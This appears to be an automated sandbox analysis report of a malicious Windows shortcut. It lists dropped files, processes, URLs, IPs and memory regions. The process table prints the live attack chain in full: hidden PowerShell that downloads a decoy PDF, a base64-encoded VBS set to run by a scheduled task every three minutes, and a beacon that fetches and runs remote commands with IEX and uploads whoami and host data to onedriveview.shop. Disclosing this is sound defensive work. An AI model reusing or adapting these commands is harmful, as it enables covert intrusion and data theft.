Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
XnQmVRj5g0.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Tue Sep 24
10:15:50 2024, mtime=Tue Sep 24 10:15:50 2024, atime=Tue Sep 24 10:15:50 2024, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\Public\Libraries\Libraries.vbs
|
ASCII text, with very long lines (842), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xb339d1f7, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6689adc7-4295-4e2d-9efe-085383a260a9.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\72c1950f-eb18-4c3d-ba2c-774aecc690ed.tmp
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF548a55.TMP (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 17
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7308
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI37b66.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1snjrv25.tcg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipq0sg3.jzv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lo0grxb.q5s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bitvsf13.5sq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxe3f4fh.cig.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qb0uk1zn.vci.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp0qkzjv.bu3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuqwudok.b45.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9166j3yn_165vzyf_5n0.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91tflhss_165vzyi_5n0.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-37-16-665.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\061a807d-5edb-4d55-b1b1-3d2f9a2e08be.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\7d2a028f-378d-4a73-8752-a5d6e7c26e87.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\8a17a3e6-f363-4e5c-8d78-736bbb360209.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\bc8e2876-66d4-4613-96d5-ea2d333bb1b3.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\61258363f7d26506.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K2H1ZXRVAT56I9K688BJ.temp
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 44 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt');
$dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content
C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3
/tr C:\Users\Public\Libraries\Libraries.vbs /f;
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs
/f
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096
--field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://onedriveview.shop/api/values/82980464243822115700/refresh81/
|
unknown
|
|
|
|
https://onedriveview.shop/api/va
|
unknown
|
|
|
|
https://onedriveview.shop/api/val
|
unknown
|
|
|
|
https://onedriveview.shop
|
unknown
|
|
|
|
https://onedriveview.shop/api/values/view/sklyar.txt
|
unknown
|
|
|
|
https://onedriveview.shop/api/value
|
unknown
|
|
|
|
https://onedriveview.shop/api/values/refresh81
|
unknown
|
|
|
|
https://onedriveview.sh
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://onedriveview.shop/api/values/82980464243822115700/refresh81/4869132.txt
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://onedriveview.shop/api/values/82980464243822115700/refresh81/4602718593.txt
|
unknown
|
||
|
https://www.adobe.co
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
http://www.microsoft.coi
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://onedriveview.shop
|
unknown
|
||
|
https://onedriveview.shop/api/values/refresh81X
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://onedriveview.shop/api/values/refresh81tesesX
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.micros
|
unknown
|
There are 23 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
unknown
|
European Union
|
||
|
23.41.168.139
|
unknown
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1BD0008C000
|
trusted library allocation
|
page read and write
|
|
|
|
19D57E46000
|
heap
|
page read and write
|
|
|
|
1DD69175000
|
heap
|
page read and write
|
|
|
|
12F1C33F000
|
heap
|
page read and write
|
|
|
|
12F1C381000
|
heap
|
page read and write
|
|
|
|
19D57E98000
|
heap
|
page read and write
|
|
|
|
1BD00354000
|
trusted library allocation
|
page read and write
|
|
|
|
1DD68FB2000
|
heap
|
page read and write
|
|
|
|
1BD73D2A000
|
heap
|
page read and write
|
|
|
|
1BD0015B000
|
trusted library allocation
|
page read and write
|
|
|
|
12F1C39A000
|
heap
|
page read and write
|
|
|
|
1E22B40C000
|
trusted library allocation
|
page read and write
|
|
|
|
12F1C465000
|
heap
|
page read and write
|
|
|
|
1DD68F77000
|
heap
|
page read and write
|
|
|
|
219E1578000
|
trusted library allocation
|
page read and write
|
|
|
|
1BD73CA0000
|
heap
|
page read and write
|
|
|
|
2178F33A000
|
trusted library allocation
|
page read and write
|
|
|
|
1E22AA70000
|
trusted library allocation
|
page read and write
|
|
|
|
1E22A735000
|
trusted library allocation
|
page read and write
|
|
|
|
1DD68F51000
|
heap
|
page read and write
|
|
|
|
2178DAE1000
|
trusted library allocation
|
page read and write
|
|
|
|
219E1904000
|
trusted library allocation
|
page read and write
|
|
|
|
19D580A5000
|
heap
|
page read and write
|
|
|
|
2178C0C0000
|
heap
|
page read and write
|
|
|
|
19D57E17000
|
heap
|
page read and write
|
|
|
|
1E22AABE000
|
trusted library allocation
|
page read and write
|
|
|
|
217A5FE3000
|
heap
|
page read and write
|
|
|
|
19D57E7D000
|
heap
|
page read and write
|
|
|
|
1E22A80C000
|
trusted library allocation
|
page read and write
|
|
|
|
12F1C346000
|
heap
|
page read and write
|
|
|
|
1E242BA6000
|
heap
|
page read and write
|
|
|
|
1E242B60000
|
heap
|
page read and write
|
|
|
|
1E228A20000
|
heap
|
page read and write
|
|
|
|
217A600F000
|
heap
|
page read and write
|
|
|
|
7FFAAC484000
|
trusted library allocation
|
page read and write
|
||
|
1BD75746000
|
heap
|
page execute and read and write
|
||
|
3D30EFE000
|
stack
|
page read and write
|
||
|
219F7C71000
|
heap
|
page read and write
|
||
|
7FFAAC536000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
A3517CF000
|
stack
|
page read and write
|
||
|
A352A4F000
|
stack
|
page read and write
|
||
|
219DDD50000
|
heap
|
page read and write
|
||
|
1E2289E5000
|
heap
|
page read and write
|
||
|
7FFAAC926000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBE0000
|
trusted library allocation
|
page read and write
|
||
|
1E22A420000
|
heap
|
page readonly
|
||
|
1FC96454000
|
heap
|
page read and write
|
||
|
3D30BFE000
|
stack
|
page read and write
|
||
|
2178C103000
|
heap
|
page read and write
|
||
|
1E22B182000
|
trusted library allocation
|
page read and write
|
||
|
1FC90D02000
|
heap
|
page read and write
|
||
|
7FFAAC956000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F19F7F000
|
stack
|
page read and write
|
||
|
7FFAACAF0000
|
trusted library allocation
|
page read and write
|
||
|
1BD004BD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC546000
|
trusted library allocation
|
page read and write
|
||
|
219E1140000
|
trusted library allocation
|
page read and write
|
||
|
1E22A6FB000
|
trusted library allocation
|
page read and write
|
||
|
1FC90C8F000
|
heap
|
page read and write
|
||
|
3D306F9000
|
stack
|
page read and write
|
||
|
2AB22FE000
|
stack
|
page read and write
|
||
|
12F1C1F0000
|
heap
|
page read and write
|
||
|
219F7E00000
|
heap
|
page read and write
|
||
|
2178DD0E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
2178E70E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
|
4F5E63E000
|
stack
|
page read and write
|
||
|
7FFAAC492000
|
trusted library allocation
|
page read and write
|
||
|
1FC90C8D000
|
heap
|
page read and write
|
||
|
219EFB50000
|
trusted library allocation
|
page read and write
|
||
|
219DDD55000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
1E242BFC000
|
heap
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA10000
|
trusted library allocation
|
page read and write
|
||
|
1FC962C0000
|
trusted library allocation
|
page read and write
|
||
|
219DF900000
|
trusted library allocation
|
page read and write
|
||
|
2AB25FB000
|
stack
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
1FC96290000
|
trusted library allocation
|
page read and write
|
||
|
1E2289B0000
|
heap
|
page read and write
|
||
|
7FFAACA60000
|
trusted library allocation
|
page execute and read and write
|
||
|
49B377E000
|
unkown
|
page readonly
|
||
|
2178F1C6000
|
trusted library allocation
|
page read and write
|
||
|
A351683000
|
stack
|
page read and write
|
||
|
7FFAAC890000
|
trusted library allocation
|
page read and write
|
||
|
1E22B214000
|
trusted library allocation
|
page read and write
|
||
|
1BD0004B000
|
trusted library allocation
|
page read and write
|
||
|
1FC90CA1000
|
heap
|
page read and write
|
||
|
217A5FE1000
|
heap
|
page read and write
|
||
|
1FC96100000
|
trusted library allocation
|
page read and write
|
||
|
2178C010000
|
heap
|
page read and write
|
||
|
1FC96290000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
|
32AC3FE000
|
stack
|
page read and write
|
||
|
1BD0056E000
|
trusted library allocation
|
page read and write
|
||
|
B56CFBC000
|
stack
|
page read and write
|
||
|
1DD68ED0000
|
heap
|
page read and write
|
||
|
1E22B312000
|
trusted library allocation
|
page read and write
|
||
|
1FC91502000
|
heap
|
page read and write
|
||
|
7FFAAC631000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E4D0000
|
unkown
|
page read and write
|
||
|
1FC962D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC483000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD00001000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
32ABB3E000
|
stack
|
page read and write
|
||
|
4F5E4B6000
|
stack
|
page read and write
|
||
|
1FC90CB3000
|
heap
|
page read and write
|
||
|
217A5AE6000
|
heap
|
page read and write
|
||
|
2178DAD0000
|
heap
|
page read and write
|
||
|
19D57D50000
|
heap
|
page read and write
|
||
|
1E242C40000
|
heap
|
page read and write
|
||
|
1BD757F0000
|
heap
|
page read and write
|
||
|
1FC9650A000
|
heap
|
page read and write
|
||
|
1E243100000
|
heap
|
